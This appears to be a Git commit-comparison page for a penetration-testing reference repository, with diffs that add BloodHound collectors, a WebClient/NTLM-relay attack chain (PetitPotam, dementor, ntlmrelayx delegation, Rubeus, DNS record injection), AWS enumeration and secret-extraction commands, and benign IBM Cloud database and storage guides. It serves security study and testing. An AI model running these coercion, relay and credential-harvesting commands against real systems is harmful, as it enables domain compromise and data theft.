Compare commits

...

5 Commits

| Author | SHA1 | Message | Date |
| --- | --- | --- | --- |
| Nidhi Shinde | ffcb09ddde | Merge c8e78f4c82 into 04842b53a8 | 2024-10-27 02:37:16 +05:30 |
| Swissky | 04842b53a8 | WebClient + RustHoundCE | 2024-10-26 16:38:15 +02:00 |
| Swissky | 26d5c2e432 | AWS update | 2024-10-24 14:43:52 +02:00 |
| Nidhi Shinde | c8e78f4c82 | Create ibm-cloud-object-storage.md | 2024-10-08 02:45:19 +05:30 |
| Nidhi Shinde | 7ffd929ec1 | Create ibm-cloud-databases.md | 2024-10-08 02:29:56 +05:30 |
11 changed files with 441 additions and 1640 deletions


@@ -2,11 +2,12 @@
## Using BloodHound
Use the appropriate data collector to gather information for **BloodHound** or **BloodHound Community Edition (CE)** across various platforms; example invocations follow the list below.
* [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) for Azure Active Directory
* [BloodHoundAD/SharpHound](https://github.com/BloodHoundAD/SharpHound) for local Active Directory (C# collector)
* [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
* [g0h4n/RustHound-CE](https://github.com/g0h4n/RustHound-CE) for local Active Directory (Rust collector)
* [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
* [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)
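A hedged sketch of typical collector invocations (the domain, credentials, nameserver, and output file name below are placeholders, and flags can differ slightly between collector releases):
```ps1
# Python collector run from an attack host (placeholder domain/credentials/nameserver)
bloodhound-python -d domain.local -u user -p 'Password123' -c All -ns 10.10.10.10

# C# collector run from a domain-joined Windows host
SharpHound.exe -c All --zipfilename bloodhound_loot.zip
```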


@@ -245,18 +245,55 @@ secretsdump.py -k -no-pass target.lab.local
* WebClient service
**Enable WebClient**:
The WebClient service can be enabled on the machine using several techniques:
* Mapping a WebDAV server with the `net` command: `net use ...` (see the sketch after the XML example below)
* Typing anything that isn't a local file or directory into the Explorer address bar
* Browsing to a directory or share that contains a file with a `.searchConnector-ms` extension, such as:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://example/</url>
</simpleLocation>
</searchConnectorDescription>
```
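For the `net use` technique listed above, one commonly cited form is shown below; the drive letter and WebDAV URL are placeholders, and mapping any WebDAV path should cause the WebClient service to start:
```ps1
net use Z: http://webdav.example.local/share
```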
**Exploitation**:
* Discover machines on the network with the WebClient service enabled
```ps1
webclientservicescanner 'domain.local'/'user':'password'@'machine'
netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
GetWebDAVStatus.exe 'machine'
```
* Disable HTTP in Responder
```ps1
sudo vi /usr/share/responder/Responder.conf
```
* Generate a Windows machine name, e.g. "WIN-UBNW4FI3AP0"
```ps1
sudo responder -I eth0
```
* Prepare for RBCD against the DC
```ps1
python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support
```
* Trigger the authentication to relay to our ntlmrelayx listener: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.10.10.10`. The listener host must be specified with the FQDN or full NetBIOS name, e.g. `logger.domain.local@80/test.txt`; specifying the IP results in an anonymous authentication instead of SYSTEM.
```ps1
# PrinterBug
dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
@@ -267,6 +304,7 @@ secretsdump.py -k -no-pass target.lab.local
Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
```
* Use the created account to ask for a service ticket:
```ps1
.\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l<i$;UzD7W'
@@ -275,6 +313,13 @@ secretsdump.py -k -no-pass target.lab.local
# IP of PC1: 10.0.0.4
```
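With delegation rights configured through ntlmrelayx, the usual follow-up is to request a service ticket while impersonating a privileged user. The sketch below uses Impacket's `getST.py`; the SPN, account, hash, and ccache file name are placeholders based on the example values above:
```ps1
# Request a TGS for the target host, impersonating a privileged user (placeholders throughout)
getST.py -spn 'cifs/pc1.purple.lab' -impersonate Administrator 'purple.lab/WVLFLLKZ$' -hashes :NTHASH
# Point Kerberos-aware tooling at the generated ccache, then authenticate with -k
export KRB5CCNAME=./Administrator.ccache
secretsdump.py -k -no-pass pc1.purple.lab
```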
An alternative to the previous exploitation method is to register a **DNS entry** for the attack machine yourself and then trigger the coercion.
```ps1
python3 /opt/krbrelayx/dnstool.py -u lab.lan\\jdoe -p 'P@ssw0rd' -r attacker.lab.lan -a add -d 192.168.1.50 192.168.1.2
python3 /opt/PetitPotam.py -u jdoe -p 'P@ssw0rd' -d lab.lan attacker@80/test 192.168.1.3
```
## Man-in-the-middle RDP connections with pyrdp-mitm

File diff suppressed because it is too large.

docs/cloud/aws/aws-cli.md (new file, 74 lines added)

@@ -0,0 +1,74 @@
# AWS - CLI
The AWS Command Line Interface (CLI) is a unified tool to manage AWS services from the command line. Using the AWS CLI, you can control multiple AWS services, automate tasks, and manage configurations through profiles.
## Set up AWS CLI
Install AWS CLI and configure it for the first time:
```ps1
aws configure
```
This will prompt for:
* AWS Access Key ID
* AWS Secret Access Key
* Default region name
* Default output format
## Creating Profiles
You can configure multiple profiles in `~/.aws/credentials` and `~/.aws/config`.
* `~/.aws/credentials` (stores credentials)
```ini
[default]
aws_access_key_id = <default-access-key>
aws_secret_access_key = <default-secret-key>
[dev-profile]
aws_access_key_id = <dev-access-key>
aws_secret_access_key = <dev-secret-key>
[prod-profile]
aws_access_key_id = <prod-access-key>
aws_secret_access_key = <prod-secret-key>
```
* `~/.aws/config` (stores region and output settings)
```ini
[default]
region = us-east-1
output = json
[profile dev-profile]
region = us-west-2
output = yaml
[profile prod-profile]
region = eu-west-1
output = json
```
You can also create profiles via the command line:
```ps1
aws configure --profile dev-profile
```
## Using Profiles
When running AWS CLI commands, you can specify which profile to use by adding the `--profile` flag:
```ps1
aws s3 ls --profile dev-profile
```
If no profile is specified, the **default** profile is used.
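A profile can also be selected for a whole shell session through the `AWS_PROFILE` environment variable, for example:
```ps1
export AWS_PROFILE=dev-profile
aws s3 ls    # runs against dev-profile without the --profile flag
```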


@@ -3,6 +3,18 @@
* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode
## Listing Information About EC2
```ps1
aws ec2 describe-instances
aws ec2 describe-instances --region region
aws ec2 describe-instances --instance-ids ID
```
## Copy EC2 using AMI Image
First you need to extract data about the current instances and their AMI/security groups/subnet: `aws ec2 describe-images --region eu-west-1`
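As a hedged sketch of the follow-up (every ID below is a placeholder), a copy of the instance can then be launched from the extracted AMI, reusing the gathered security group and subnet:
```ps1
aws ec2 run-instances --region eu-west-1 --image-id ami-0123456789abcdef0 --instance-type t2.micro --security-group-ids sg-0123456789abcdef0 --subnet-id subnet-0123456789abcdef0 --key-name my-keypair
```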


@@ -1,6 +1,19 @@
# AWS - Identity & Access Management
## Listing IAM Access Keys
```ps1
aws iam list-access-keys
```
### Listing IAM Users and Groups
```ps1
aws iam list-users
aws iam list-groups
```
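To spot over-privileged principals before hunting the shadow-admin permissions below, enumerate the policies attached to a user; the user name, policy ARN, and version ID are placeholders:
```ps1
aws iam list-attached-user-policies --user-name jdoe
aws iam list-user-policies --user-name jdoe
aws iam get-policy-version --policy-arn arn:aws:iam::123456789012:policy/ExamplePolicy --version-id v1
```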
## Shadow Admin
### Admin equivalent permission
@@ -104,7 +117,6 @@
```
## References
* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/)


@@ -1,7 +1,21 @@
# AWS - Service - Lambda & API Gateway
## List Lambda Functions
```ps1
aws lambda list-functions
```
### Invoke a Lambda Function
```ps1
aws lambda invoke --function-name name response.json --region region
```
## Extract Function's Code
```powershell
aws lambda list-functions --profile uploadcreds
@@ -10,6 +24,37 @@ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
```
## List API Gateway
```ps1
aws apigateway get-rest-apis
aws apigateway get-rest-api --rest-api-id ID
```
## Listing Information About Endpoints
```ps1
aws apigateway get-resources --rest-api-id ID
aws apigateway get-resource --rest-api-id ID --resource-id ID
aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
```
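Once an API ID, stage, and resource path are known, the deployed endpoint can be called directly. The stage lookup below uses `get-stages`, and the invoke URL follows the standard `execute-api` pattern; all identifiers are placeholders:
```ps1
aws apigateway get-stages --rest-api-id a1b2c3d4e5
curl https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/prod/users
```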
## Listing API Keys
```ps1
aws apigateway get-api-keys --include-values
```
## Getting Information About a Specific API Key
```ps1
aws apigateway get-api-key --api-key KEY
```
## References
* [Getting shell and data access in AWS by chaining vulnerabilities - Appsecco - Riyaz Walikar - Aug 29, 2019](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)


@@ -5,7 +5,7 @@
:warning: Only works with IMDSv1.
Enabling IMDSv2: `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-tokens required`.
In order to use **IMDSv2** you must provide a token.
```powershell
export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
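# With the token in hand, subsequent metadata requests must send it in the
# X-aws-ec2-metadata-token header (hedged example continuing the export above)
curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/"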


@@ -58,12 +58,13 @@ export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
```
## Open S3 Bucket
## Public S3 Bucket
An open S3 bucket refers to an Amazon Simple Storage Service (Amazon S3) bucket that has been configured to allow public access, either intentionally or by mistake. This means that anyone on the internet could potentially access, read, or even modify the data stored in the bucket, depending on the permissions set.
* [http://s3.amazonaws.com/<bucket-name>/](http://s3.amazonaws.com/<bucket-name>/)
* [http://<bucket-name>.s3.amazonaws.com/](http://<bucket-name>.s3.amazonaws.com/)
* [https://<bucket-name>.region.amazonaws.com/<file>](https://<bucket-name>.region.amazonaws.com/<file>)
Example of an AWS S3 bucket name: [http://flaws.cloud.s3.amazonaws.com](http://flaws.cloud.s3.amazonaws.com).
@@ -107,21 +108,21 @@ aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
### Copy, Upload and Download Files
* **Copy**
```bash
aws s3 cp <source> <target> [--options]
aws s3 cp local.txt s3://bucket-name/remote.txt --acl authenticated-read
aws s3 cp login.html s3://bucket-name --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
```
* **Upload**
```bash
aws s3 mv <source> <target> [--options]
aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
```
* **Download**
```bash
aws s3 sync <source> <target> [--options]
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2


@@ -0,0 +1,129 @@
# IBM Cloud Managed Database Services
IBM Cloud offers a variety of managed database services that allow organizations to easily deploy, manage, and scale databases without the operational overhead. These services ensure high availability, security, and performance, catering to a wide range of application requirements.
## Supported Database Engines
### 1. PostgreSQL
- **Description**: PostgreSQL is an open-source relational database known for its robustness, extensibility, and SQL compliance. It supports advanced data types and offers features like complex queries, ACID compliance, and full-text search.
- **Key Features**:
- Automated backups and recovery
- High availability with clustering options
- Scale horizontally and vertically with ease
- Support for JSON and unstructured data
- Advanced security features including encryption
- **Use Cases**:
- Web applications
- Data analytics
- Geospatial data applications
- E-commerce platforms
#### Connecting to PostgreSQL
You can connect to a PostgreSQL database using various programming languages. Here's an example in Python using the `psycopg2` library.
```python
import psycopg2
# Establishing a connection to the PostgreSQL database
conn = psycopg2.connect(
dbname="your_database_name",
user="your_username",
password="your_password",
host="your_host",
port="your_port"
)
cursor = conn.cursor()
# Example of a simple query
cursor.execute("SELECT * FROM your_table;")
records = cursor.fetchall()
print(records)
# Closing the connection
cursor.close()
conn.close()
```
### 2. MongoDB
- **Description**: MongoDB is a leading NoSQL database that provides a flexible data model, enabling developers to work with unstructured data and large volumes of data. It uses a document-oriented data model and is designed for scalability and performance.
- **Key Features**:
- Automatic sharding for horizontal scaling
- Built-in replication for high availability
- Rich querying capabilities and indexing options
- Full-text search and aggregation framework
- Flexible schema design
- **Use Cases**:
- Content management systems
- Real-time analytics
- Internet of Things (IoT) applications
- Mobile applications
#### Connecting to MongoDB
You can connect to MongoDB using various programming languages. Here's an example in JavaScript using the mongodb library.
```javascript
const { MongoClient } = require('mongodb');
// Connection URI
const uri = "mongodb://your_username:your_password@your_host:your_port/your_database";
// Create a new MongoClient
const client = new MongoClient(uri);
async function run() {
try {
// Connect to the MongoDB cluster
await client.connect();
// Access the database
const database = client.db('your_database');
const collection = database.collection('your_collection');
// Example of a simple query
const query = { name: "John Doe" };
const user = await collection.findOne(query);
console.log(user);
} finally {
// Ensures that the client will close when you finish/error
await client.close();
}
}
run().catch(console.dir);
```
## Benefits of Using IBM Cloud Managed Database Services
- **Automated Management**: Reduce operational overhead with automated backups, scaling, and updates.
- **High Availability**: Built-in redundancy and failover mechanisms ensure uptime and data availability.
- **Security**: Comprehensive security features protect your data with encryption, access controls, and compliance support.
- **Scalability**: Easily scale your database resources up or down based on application needs.
- **Performance Monitoring**: Built-in monitoring and alerting tools provide insights into database performance and health.
## Getting Started
To begin using IBM Cloud Managed Database services, follow these steps:
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Select Database Service**: Choose the managed database service you need (PostgreSQL, MongoDB, etc.).
3. **Configure Your Database**: Set up your database parameters, including region, storage size, and instance type.
4. **Deploy**: Launch your database instance with a few clicks.
5. **Connect**: Use the provided connection string to connect your applications to the database.
## Conclusion
IBM Cloud's managed database services provide a reliable and efficient way to manage your database needs. With support for leading databases like PostgreSQL and MongoDB, organizations can focus on building innovative applications while leveraging IBM's infrastructure and expertise.
## Additional Resources
- [IBM Cloud Databases Documentation](https://cloud.ibm.com/docs/databases?code=cloud)
- [IBM Cloud PostgreSQL Documentation](https://cloud.ibm.com/docs/databases?code=postgres)
- [IBM Cloud MongoDB Documentation](https://cloud.ibm.com/docs/databases?code=mongo)


@@ -0,0 +1,106 @@
# IBM Cloud Object Storage
IBM Cloud Object Storage is a highly scalable, secure, and durable cloud storage service designed for storing and accessing unstructured data like images, videos, backups, and documents. With the ability to scale seamlessly based on the data volume, IBM Cloud Object Storage is ideal for handling large-scale data storage needs, such as archiving, backup, and modern applications like AI and machine learning workloads.
## Key Features
### 1. **Scalability**
- **Dynamic Scaling**: IBM Cloud Object Storage can grow dynamically with your data needs, ensuring you never run out of storage space. There's no need for pre-provisioning or capacity planning, as it scales automatically based on demand.
- **No Size Limits**: Store an unlimited amount of data, from kilobytes to petabytes, without constraints.
### 2. **High Durability and Availability**
- **Redundancy**: Data is automatically distributed across multiple regions and availability zones to ensure that it remains available and protected, even in the event of failures.
- **99.999999999% Durability (11 nines)**: IBM Cloud Object Storage provides enterprise-grade durability, meaning that your data is safe and recoverable.
### 3. **Flexible Storage Classes**
IBM Cloud Object Storage offers multiple storage classes, allowing you to choose the right balance between performance and cost:
- **Standard**: For frequently accessed data, providing high performance and low latency.
- **Vault**: For infrequently accessed data with lower storage costs.
- **Cold Vault**: For long-term storage of rarely accessed data, such as archives.
- **Smart Tier**: Automatically optimizes storage costs by tiering objects based on access patterns.
### 4. **Secure and Compliant**
- **Encryption**: Data is encrypted at rest and in transit using robust encryption standards.
- **Access Controls**: Fine-grained access policies using IBM Identity and Access Management (IAM) allow you to control who can access your data.
- **Compliance**: Meets a wide range of industry standards and regulatory requirements, including GDPR, HIPAA, and ISO certifications.
### 5. **Cost-Effective**
- **Pay-as-You-Go**: With IBM Cloud Object Storage, you only pay for the storage and features you use, making it cost-effective for a variety of workloads.
- **Data Lifecycle Policies**: Automate data movement between storage classes to optimize costs over time based on data access patterns.
### 6. **Global Accessibility**
- **Multi-Regional Replication**: Distribute your data across multiple regions for greater accessibility and redundancy.
- **Low Latency**: Access your data with minimal latency, no matter where your users or applications are located globally.
### 7. **Integration with IBM Cloud Services**
IBM Cloud Object Storage integrates seamlessly with a wide range of IBM Cloud services, including:
- **IBM Watson AI**: Store and manage data used in AI and machine learning workloads.
- **IBM Cloud Functions**: Use serverless computing to trigger actions when new objects are uploaded.
- **IBM Kubernetes Service**: Persistent storage for containers and microservices applications.
## Use Cases
1. **Backup and Archiving**:
- IBM Cloud Object Storage is ideal for long-term storage of backups and archived data due to its durability and cost-efficient pricing models. Data lifecycle policies automate the movement of less-frequently accessed data to lower-cost storage classes like Vault and Cold Vault.
2. **Content Delivery**:
- Serve media files like images, videos, and documents to global users with minimal latency using IBM Cloud Object Storage's multi-regional replication and global accessibility.
3. **Big Data and Analytics**:
- Store large datasets and logs for analytics applications. IBM Cloud Object Storage can handle vast amounts of data, which can be processed using IBM analytics services or machine learning models.
4. **Disaster Recovery**:
- Ensure business continuity by storing critical data redundantly across multiple locations, allowing you to recover from disasters or data loss events.
5. **AI and Machine Learning**:
- Store and manage training datasets for machine learning and AI applications. IBM Cloud Object Storage integrates directly with IBM Watson and other AI services, providing scalable storage for vast datasets.
## Code Example: Uploading and Retrieving Data
Here's an example using Python and the IBM Cloud SDK to upload and retrieve an object from IBM Cloud Object Storage.
### 1. **Installation**:
Install the IBM Cloud Object Storage SDK for Python:
```bash
pip install ibm-cos-sdk
```
### 2. **Uploading an Object**:
```python
import ibm_boto3
from ibm_botocore.client import Config
# Initialize the client
cos = ibm_boto3.client('s3',
ibm_api_key_id='your_api_key',
ibm_service_instance_id='your_service_instance_id',
config=Config(signature_version='oauth'),
endpoint_url='https://s3.us.cloud-object-storage.appdomain.cloud')
# Upload a file
cos.upload_file(Filename='example.txt', Bucket='your_bucket_name', Key='example.txt')
print('File uploaded successfully.')
```
### 3. **Retrieving an Object**:
```python
# Download an object
cos.download_file(Bucket='your_bucket_name', Key='example.txt', Filename='downloaded_example.txt')
print('File downloaded successfully.')
```
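### 4. **Listing Objects**:
A minimal sketch reusing the `cos` client from step 2; the SDK follows the boto3 S3 client interface, and the bucket name is a placeholder.
```python
# List the objects in a bucket (assumes the client initialized in the upload example)
response = cos.list_objects_v2(Bucket='your_bucket_name')
for obj in response.get('Contents', []):
    print(obj['Key'], obj['Size'])
```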
### Configuring IBM Cloud Object Storage
To start using IBM Cloud Object Storage, follow these steps:
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Create Object Storage**: In the IBM Cloud console, navigate to **Catalog** > **Storage** > **Object Storage**, and follow the steps to create an instance.
3. **Create Buckets**: After creating an instance, you can create storage containers (buckets) to store your objects. Buckets are where data is logically stored.
4. **Manage Access**: Define access policies using IBM IAM for your Object Storage buckets.
5. **Connect and Use**: Use the provided API keys and endpoints to connect to your Object Storage instance and manage your data.
## Conclusion
IBM Cloud Object Storage offers a highly scalable, durable, and cost-effective storage solution for various types of workloads, from simple backups to complex AI and big data applications. With features like lifecycle management, security, and integration with other IBM Cloud services, it's a flexible choice for any organization looking to manage unstructured data efficiently.